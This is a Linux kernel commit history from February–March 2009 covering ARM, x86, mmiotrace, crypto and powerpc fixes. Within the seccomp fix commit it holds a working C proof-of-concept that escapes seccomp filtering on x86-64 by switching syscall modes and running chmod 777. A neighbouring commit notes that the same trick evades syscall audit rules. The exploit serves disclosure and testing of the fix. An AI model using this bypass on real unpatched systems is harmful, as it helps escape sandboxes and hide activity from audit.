1. 08 3月, 2009 1 次提交
  2. 04 3月, 2009 1 次提交
  3. 03 3月, 2009 6 次提交
    • C
      [ARM] 5417/1: Set the correct cacheid for ARMv6 CPUs with ARMv7 style MMU · b57ee99f
      Catalin Marinas 提交于
      The cacheid_init() function assumes that if cpu_architecture() returns
      7, the caches are VIPT_NONALIASING. The cpu_architecture() function
      returns the version of the supported MMU features (e.g. TEX remapping)
      but it doesn't make any assumptions about the cache type. The patch adds
      the checking of the Cache Type Register for the ARMv7 format.
      Signed-off-by: NCatalin Marinas <catalin.marinas@arm.com>
      Signed-off-by: NRussell King <rmk+kernel@arm.linux.org.uk>
      b57ee99f
    • S
      [ARM] 5416/1: Use unused address in v6_early_abort · 25ef4a67
      Seth Forshee 提交于
      The target of the strex instruction to clear the exlusive monitor
      is currently the top of the stack.  If the store succeeeds this
      corrupts r0 in pt_regs.  Use the next stack location instead of
      the current one to prevent any chance of corrupting an in-use
      address.
      Signed-off-by: NSeth Forshee <seth.forshee@gmail.com>
      Signed-off-by: NRussell King <rmk+kernel@arm.linux.org.uk>
      25ef4a67
    • T
      x86: oprofile: don't set counter width from cpuid on Core2 · 780eef94
      Tim Blechmann 提交于
      Impact: fix stuck NMIs and non-working oprofile on certain CPUs
      
      Resetting the counter width of the performance counters on Intel's
      Core2 CPUs, breaks the delivery of NMIs, when running in x86_64 mode.
      
      This should fix bug #12395:
      
        http://bugzilla.kernel.org/show_bug.cgi?id=12395Signed-off-by: NTim Blechmann <tim@klingt.org>
      Signed-off-by: NRobert Richter <robert.richter@amd.com>
      LKML-Reference: <20090303100412.GC10085@erda.amd.com>
      Cc: <stable@kernel.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      780eef94
    • Y
      x86: fix init_memory_mapping() to handle small ranges · 0fc59d3a
      Yinghai Lu 提交于
      Impact: fix failed EFI bootup in certain circumstances
      
      Ying Huang found init_memory_mapping() has problem with small ranges
      less than 2M when he tried to direct map the EFI runtime code out of
      max_low_pfn_mapped.
      
      It turns out we never considered that case and didn't check the range...
      Reported-by: NYing Huang <ying.huang@intel.com>
      Signed-off-by: NYinghai Lu <yinghai@kernel.org>
      Cc: Brian Maly <bmaly@redhat.com>
      LKML-Reference: <49ACDDED.1060508@kernel.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      0fc59d3a
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
    • R
      x86-64: syscall-audit: fix 32/64 syscall hole · ccbe495c
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases, audit_syscall_entry() will use the wrong system
      call number table and the wrong system call argument registers.  This
      could be used to circumvent a syscall audit configuration that filters
      based on the syscall numbers or argument details.
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      ccbe495c
  4. 02 3月, 2009 7 次提交
    • P
      x86 mmiotrace: fix race with release_kmmio_fault_page() · 340430c5
      Pekka Paalanen 提交于
      There was a theoretical possibility to a race between arming a page in
      post_kmmio_handler() and disarming the page in
      release_kmmio_fault_page():
      
      cpu0                             cpu1
      ------------------------------------------------------------------
      mmiotrace shutdown
      enter release_kmmio_fault_page
                                       fault on the page
                                       disarm the page
      disarm the page
                                       handle the MMIO access
                                       re-arm the page
      put the page on release list
      remove_kmmio_fault_pages()
                                       fault on the page
                                       page not known to mmiotrace
                                       fall back to do_page_fault()
                                       *KABOOM*
      
      (This scenario also shows the double disarm case which is allowed.)
      
      Fixed by acquiring kmmio_lock in post_kmmio_handler() and checking
      if the page is being released from mmiotrace.
      Signed-off-by: NPekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      340430c5
    • S
      x86 mmiotrace: improve handling of secondary faults · 3e39aa15
      Stuart Bennett 提交于
      Upgrade some kmmio.c debug messages to warnings.
      Allow secondary faults on probed pages to fall through, and only log
      secondary faults that are not due to non-present pages.
      
      Patch edited by Pekka Paalanen.
      Signed-off-by: NStuart Bennett <stuart@freedesktop.org>
      Signed-off-by: NPekka Paalanen <pq@iki.fi>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      3e39aa15
    • P
      x86 mmiotrace: split set_page_presence() · 0b700a6a
      Pekka Paalanen 提交于
      From 36772dcb6ffbbb68254cbfc379a103acd2fbfefc Mon Sep 17 00:00:00 2001
      From: Pekka Paalanen <pq@iki.fi>
      Date: Sat, 28 Feb 2009 21:34:59 +0200
      
      Split set_page_presence() in kmmio.c into two more functions set_pmd_presence()
      and set_pte_presence(). Purely code reorganization, no functional changes.
      Signed-off-by: NPekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      0b700a6a
    • P
      x86 mmiotrace: fix save/restore page table state · 5359b585
      Pekka Paalanen 提交于
      From baa99e2b32449ec7bf147c234adfa444caecac8a Mon Sep 17 00:00:00 2001
      From: Pekka Paalanen <pq@iki.fi>
      Date: Sun, 22 Feb 2009 20:02:43 +0200
      
      Blindly setting _PAGE_PRESENT in disarm_kmmio_fault_page() overlooks the
      possibility, that the page was not present when it was armed.
      
      Make arm_kmmio_fault_page() store the previous page presence in struct
      kmmio_fault_page and use it on disarm.
      
      This patch was originally written by Stuart Bennett, but Pekka Paalanen
      rewrote it a little different.
      Signed-off-by: NPekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      5359b585
    • S
      x86 mmiotrace: WARN_ONCE if dis/arming a page fails · e9d54cae
      Stuart Bennett 提交于
      Print a full warning once, if arming or disarming a page fails.
      
      Also, if initial arming fails, do not handle the page further. This
      avoids the possibility of a page failing to arm and then later claiming
      to have handled any fault on that page.
      
      WARN_ONCE added by Pekka Paalanen.
      Signed-off-by: NStuart Bennett <stuart@freedesktop.org>
      Signed-off-by: NPekka Paalanen <pq@iki.fi>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      e9d54cae
    • P
      x86: add far read test to testmmiotrace · 5ff93697
      Pekka Paalanen 提交于
      Apparently pages far into an ioremapped region might not actually be
      mapped during ioremap(). Add an optional read test to try to trigger a
      multiply faulting MMIO access. Also add more messages to the kernel log
      to help debugging.
      
      This patch is based on a patch suggested by
      Stuart Bennett <stuart@freedesktop.org>
      who discovered bugs in mmiotrace related to normal kernel space faults.
      Signed-off-by: NPekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      5ff93697
    • P
      x86: count errors in testmmiotrace.ko · fab852aa
      Pekka Paalanen 提交于
      Check the read values against the written values in the MMIO read/write
      test. This test shows if the given MMIO test area really works as
      memory, which is a prerequisite for a successful mmiotrace test.
      Signed-off-by: NPekka Paalanen <pq@iki.fi>
      Cc: Stuart Bennett <stuart@freedesktop.org>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      fab852aa
  5. 28 2月, 2009 6 次提交
  6. 27 2月, 2009 15 次提交
  7. 26 2月, 2009 4 次提交
    • H
      crypto: api - Fix module load deadlock with fallback algorithms · a760a665
      Herbert Xu 提交于
      With the mandatory algorithm testing at registration, we have
      now created a deadlock with algorithms requiring fallbacks.
      This can happen if the module containing the algorithm requiring
      fallback is loaded first, without the fallback module being loaded
      first.  The system will then try to test the new algorithm, find
      that it needs to load a fallback, and then try to load that.
      
      As both algorithms share the same module alias, it can attempt
      to load the original algorithm again and block indefinitely.
      
      As algorithms requiring fallbacks are a special case, we can fix
      this by giving them a different module alias than the rest.  Then
      it's just a matter of using the right aliases according to what
      algorithms we're trying to find.
      Signed-off-by: NHerbert Xu <herbert@gondor.apana.org.au>
      a760a665
    • M
      powerpc: Fix 64bit __copy_tofrom_user() regression · f72b728b
      Mark Nelson 提交于
      This fixes a regression introduced by commit
      a4e22f02 ("powerpc: Update 64bit
      __copy_tofrom_user() using CPU_FTR_UNALIGNED_LD_STD").
      
      The same bug that existed in the 64bit memcpy() also exists here so fix
      it here too. The fix is the same as that applied to memcpy() with the
      addition of fixes for the exception handling code required for
      __copy_tofrom_user().
      
      This stops us reading beyond the end of the source region we were told
      to copy.
      Signed-off-by: NMark Nelson <markn@au1.ibm.com>
      Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
      f72b728b
    • M
      powerpc: Fix 64bit memcpy() regression · e423b9ec
      Mark Nelson 提交于
      This fixes a regression introduced by commit
      25d6e2d7 ("powerpc: Update 64bit memcpy()
      using CPU_FTR_UNALIGNED_LD_STD").
      
      This commit allowed CPUs that have the CPU_FTR_UNALIGNED_LD_STD CPU
      feature bit present to do the memcpy() with unaligned load doubles. But,
      along with this came a bug where our final load double would read bytes
      beyond a page boundary and into the next (unmapped) page. This was caught
      by enabling CONFIG_DEBUG_PAGEALLOC,
      
      The fix was to read only the number of bytes that we need to store rather
      than reading a full 8-byte doubleword and storing only a portion of that.
      
      In order to minimise the amount of existing code touched we use the
      original do_tail for the src_unaligned case.
      
      Below is an example of the regression, as reported by Sachin Sant:
      
      Unable to handle kernel paging request for data at address 0xc00000003f380000
      Faulting instruction address: 0xc000000000039574
      cpu 0x1: Vector: 300 (Data Access) at [c00000003baf3020]
          pc: c000000000039574: .memcpy+0x74/0x244
          lr: d00000000244916c: .ext3_xattr_get+0x288/0x2f4 [ext3]
          sp: c00000003baf32a0
         msr: 8000000000009032
         dar: c00000003f380000
       dsisr: 40000000
        current = 0xc00000003e54b010
        paca    = 0xc000000000a53680
          pid   = 1840, comm = readahead
      enter ? for help
      [link register   ] d00000000244916c .ext3_xattr_get+0x288/0x2f4 [ext3]
      [c00000003baf32a0] d000000002449104 .ext3_xattr_get+0x220/0x2f4 [ext3]
      (unreliab
      le)
      [c00000003baf3390] d00000000244a6e8 .ext3_xattr_security_get+0x40/0x5c [ext3]
      [c00000003baf3400] c000000000148154 .generic_getxattr+0x74/0x9c
      [c00000003baf34a0] c000000000333400 .inode_doinit_with_dentry+0x1c4/0x678
      [c00000003baf3560] c00000000032c6b0 .security_d_instantiate+0x50/0x68
      [c00000003baf35e0] c00000000013c818 .d_instantiate+0x78/0x9c
      [c00000003baf3680] c00000000013ced0 .d_splice_alias+0xf0/0x120
      [c00000003baf3720] d00000000243e05c .ext3_lookup+0xec/0x134 [ext3]
      [c00000003baf37c0] c000000000131e74 .do_lookup+0x110/0x260
      [c00000003baf3880] c000000000134ed0 .__link_path_walk+0xa98/0x1010
      [c00000003baf3970] c0000000001354a0 .path_walk+0x58/0xc4
      [c00000003baf3a20] c000000000135720 .do_path_lookup+0x138/0x1e4
      [c00000003baf3ad0] c00000000013645c .path_lookup_open+0x6c/0xc8
      [c00000003baf3b70] c000000000136780 .do_filp_open+0xcc/0x874
      [c00000003baf3d10] c0000000001251e0 .do_sys_open+0x80/0x140
      [c00000003baf3dc0] c00000000016aaec .compat_sys_open+0x24/0x38
      [c00000003baf3e30] c00000000000855c syscall_exit+0x0/0x40
      Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
      e423b9ec
    • M
      powerpc: Fix load/store float double alignment handler · 49f297f8
      Michael Neuling 提交于
      When we introduced VSX, we changed the way FPRs are stored in the
      thread_struct.  Unfortunately we missed the load/store float double
      alignment handler code when updating how we access FPRs in the
      thread_struct.
      
      Below fixes this and merges the little/big endian case.
      Signed-off-by: NMichael Neuling <mikey@neuling.org>
      Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
      49f297f8